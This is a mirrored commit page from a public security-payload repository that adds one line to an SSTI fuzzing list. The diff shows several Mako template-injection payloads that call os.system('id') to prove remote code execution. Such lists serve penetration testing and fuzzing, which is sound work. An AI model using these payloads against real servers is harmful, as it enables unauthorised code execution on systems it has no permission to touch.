1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-05-27 08:56:05 +02:00

Update ssti.fuzz

This commit is contained in:
p0dalirius 2021-10-04 09:21:10 +02:00
parent 8c7f18a1e0
commit 7f8f8216db

View File

@ -66,3 +66,4 @@ ${self.attr._NSAttr__parent.module.cache.util.os.system("id")}
${self.template.module.filters.compat.inspect.os.system("id")}
${self.template.module.runtime.compat.inspect.os.system("id")}
${self.module.filters.compat.inspect.linecache.os.system("id")}
${self.module.runtime.compat.inspect.linecache.os.system("id")}